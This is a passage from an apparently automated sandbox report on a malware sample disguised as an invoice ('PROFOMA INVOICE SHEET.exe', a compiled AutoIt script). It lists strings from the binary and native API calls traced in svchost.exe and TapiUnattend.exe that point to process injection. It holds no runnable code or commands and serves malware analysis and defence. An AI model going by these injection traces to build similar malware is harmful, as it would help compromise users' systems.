            Source: PROFOMA INVOICE SHEET.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PROFOMA INVOICE SHEET.exe, 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f524b93f-b
            Source: PROFOMA INVOICE SHEET.exe, 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_55c5c27b-7
            Source: PROFOMA INVOICE SHEET.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0612b9e1-a
            Source: PROFOMA INVOICE SHEET.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_af47f462-9
            Source: initial sampleStatic PE information: Filename: PROFOMA INVOICE SHEET.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C683 NtClose,1_2_0042C683
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B60 NtClose,LdrInitializeThunk,1_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk,1_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74340 NtSetContextThread,1_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74650 NtSuspendThread,1_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BE0 NtQueryValueKey,1_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BF0 NtAllocateVirtualMemory,1_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B80 NtQueryInformationFile,1_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BA0 NtEnumerateValueKey,1_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AD0 NtReadFile,1_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AF0 NtWriteFile,1_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AB0 NtWaitForSingleObject,1_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FE0 NtCreateFile,1_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F90 NtProtectVirtualMemory,1_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FA0 NtQuerySection,1_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FB0 NtResumeThread,1_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F60 NtCreateProcessEx,1_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F30 NtCreateSection,1_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EE0 NtQueueApcThread,1_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E80 NtReadVirtualMemory,1_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EA0 NtAdjustPrivilegesToken,1_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E30 NtWriteVirtualMemory,1_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DD0 NtDelayExecution,1_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DB0 NtEnumerateKey,1_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D00 NtSetInformationFile,1_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D10 NtMapViewOfSection,1_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D30 NtUnmapViewOfSection,1_2_03C72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CC0 NtQueryVirtualMemory,1_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CF0 NtOpenProcess,1_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CA0 NtQueryInformationToken,1_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C60 NtCreateKey,1_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C00 NtQueryInformationProcess,1_2_03C72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73090 NtSetValueKey,1_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73010 NtOpenDirectoryObject,1_2_03C73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C739B0 NtGetContextThread,1_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D70 NtOpenThread,1_2_03C73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D10 NtOpenProcessToken,1_2_03C73D10
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03354340 NtSetContextThread,LdrInitializeThunk,6_2_03354340
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03354650 NtSuspendThread,LdrInitializeThunk,6_2_03354650
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352B60 NtClose,LdrInitializeThunk,6_2_03352B60
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03352BA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03352BF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03352BE0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352AF0 NtWriteFile,LdrInitializeThunk,6_2_03352AF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352AD0 NtReadFile,LdrInitializeThunk,6_2_03352AD0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352F30 NtCreateSection,LdrInitializeThunk,6_2_03352F30
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352FB0 NtResumeThread,LdrInitializeThunk,6_2_03352FB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352FE0 NtCreateFile,LdrInitializeThunk,6_2_03352FE0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03352E80
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03352EE0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03352D30
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03352D10
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03352DF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352DD0 NtDelayExecution,LdrInitializeThunk,6_2_03352DD0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03352C70
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352C60 NtCreateKey,LdrInitializeThunk,6_2_03352C60
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03352CA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033535C0 NtCreateMutant,LdrInitializeThunk,6_2_033535C0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033539B0 NtGetContextThread,LdrInitializeThunk,6_2_033539B0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352B80 NtQueryInformationFile,6_2_03352B80
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352AB0 NtWaitForSingleObject,6_2_03352AB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352F60 NtCreateProcessEx,6_2_03352F60
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352FA0 NtQuerySection,6_2_03352FA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352F90 NtProtectVirtualMemory,6_2_03352F90
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352E30 NtWriteVirtualMemory,6_2_03352E30
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352EA0 NtAdjustPrivilegesToken,6_2_03352EA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352D00 NtSetInformationFile,6_2_03352D00
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352DB0 NtEnumerateKey,6_2_03352DB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352C00 NtQueryInformationProcess,6_2_03352C00
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352CF0 NtOpenProcess,6_2_03352CF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03352CC0 NtQueryVirtualMemory,6_2_03352CC0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03353010 NtOpenDirectoryObject,6_2_03353010
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03353090 NtSetValueKey,6_2_03353090
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03353D10 NtOpenProcessToken,6_2_03353D10
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03353D70 NtOpenThread,6_2_03353D70
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_029092A0 NtReadFile,6_2_029092A0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_029093A0 NtDeleteFile,6_2_029093A0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02909130 NtCreateFile,6_2_02909130
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_02909440 NtClose,6_2_02909440
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_029095A0 NtAllocateVirtualMemory,6_2_029095A0
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0036D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0036D5EB
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00361201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00361201
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0036E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0036E8F6
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0030BF400_2_0030BF40
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003080600_2_00308060
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003720460_2_00372046
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003682980_2_00368298
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0033E4FF0_2_0033E4FF
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0033676B0_2_0033676B
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003948730_2_00394873
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0032CAA00_2_0032CAA0
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0030CAF00_2_0030CAF0
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0031CC390_2_0031CC39
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00336DD90_2_00336DD9
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0031D0640_2_0031D064
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0031B1190_2_0031B119
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003091C00_2_003091C0
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003213940_2_00321394
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003217060_2_00321706
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0032781B0_2_0032781B
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003079200_2_00307920
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0031997D0_2_0031997D
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003219B00_2_003219B0
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00327A4A0_2_00327A4A
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00321C770_2_00321C77
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00327CA70_2_00327CA7
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00353CD20_2_00353CD2
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0038BE440_2_0038BE44
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00339EEE0_2_00339EEE
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00321F320_2_00321F32
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_03DBCA800_2_03DBCA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004185D31_2_004185D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100331_2_00410033
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E0B31_2_0040E0B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011B01_2_004011B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004022B01_2_004022B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042ECD31_2_0042ECD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025C01_2_004025C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE131_2_0040FE13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167C31_2_004167C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FA01_2_00402FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167BE1_2_004167BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F01_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D003E61_2_03D003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA3521_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC02C01_2_03CC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE02741_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF81CC1_2_03CF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF41A21_2_03CF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D001AA1_2_03D001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC81581_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C301001_2_03C30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA1181_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD20001_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C01_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C647501_2_03C64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C407701_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C6E01_2_03C5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D005911_2_03D00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C405351_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEE4F61_2_03CEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF24461_2_03CF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE44201_2_03CE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF6BD71_2_03CF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFAB401_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA801_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A01_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0A9A61_2_03D0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C569621_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E8F01_2_03C6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C268B81_2_03C268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4A8401_2_03C4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428401_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32FC81_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBEFA01_2_03CBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4F401_2_03CB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C82F281_2_03C82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60F301_2_03C60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE2F301_2_03CE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEEDB1_2_03CFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52E901_2_03C52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFCE931_2_03CFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40E591_2_03C40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEE261_2_03CFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3ADE01_2_03C3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C58DBF1_2_03C58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4AD001_2_03C4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDCD1F1_2_03CDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30CF21_2_03C30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0CB51_2_03CE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40C001_2_03C40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8739A1_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2D34C1_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF132D1_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B2C01_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE12ED1_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5D2F01_2_03C5D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C452A01_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4B1B01_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7516C1_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2F1721_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0B16B1_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEF0CC1_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C470C01_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF70E91_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF0E01_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF7B01_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF16CC1_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDD5B01_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF75711_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C314601_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF43F1_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB5BF01_2_03CB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7DBF91_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FB801_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFB761_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEDAC61_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDDAAC1_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85AA01_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE1AA31_2_03CE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFA491_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7A461_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB3A6C1_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C499501_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B9501_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD59101_2_03CD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C438E01_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAD8001_2_03CAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C41F921_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFFB11_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFF091_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C49EB01_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FDC01_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C43D401_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF1D5A1_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7D731_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFCF21_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB9C321_2_03CB9C32
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DA3526_2_033DA352
